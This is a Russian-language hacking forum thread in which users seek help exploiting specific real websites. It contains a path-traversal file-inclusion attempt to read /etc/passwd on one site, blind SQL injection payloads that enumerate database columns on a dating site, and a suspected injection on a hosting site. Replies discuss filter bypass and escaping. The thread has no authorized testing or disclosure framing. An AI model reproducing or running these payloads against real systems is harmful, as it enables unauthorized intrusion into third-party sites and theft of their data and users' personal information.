http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=index.php так этот инклюд можно как-то раскрутить или не? Просто не понимаю есть фильтр или нет.

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd
Скорее всего есть чем нету.

Это инклюд, но инклюд с фильтром.
В lang нельзя использовать

Была бы простая инъекция-непопросил бы помоши.Твое предложение к сожелению неподойдет
Узнал что есть таблица acces.
Когда делаю запрос _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from+acces),1,1))%3E=1,1, 0)--+
Ошибка.Пробовал перекодировать в хекс,все равно,но по ошибка и если попробовать _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from++CHARACTER_SETS),1,1 ))%3E=1,1,0)--+
Прошу сильно не пинать-с блиндом только учусь работать( и с POST инъекциями )

http://www.dneprohost.com.ua/dp.php?key=' вроде инъекция, но там запрос какойто необычный мб нужен, помогите

http://forum.antichat.ru/thread104591.html

Подчёркиваю: инъекция, это именно возможность влиять на запрос, возможность внедрить в него что-то, а не просто ошибка базы. (c)Jokester

пробуй проверить ее на логику, не получается выполнить логику значит не SQl-inj

Так как только с GET полявляется .. или / ошибки пропадают, откуда я знаю обход срабатывает или нет?

Этот инклюд тоже глухой?

Тут вообще его нет =\ похоже на ошибку в логике скрипта

Там экранирование просто.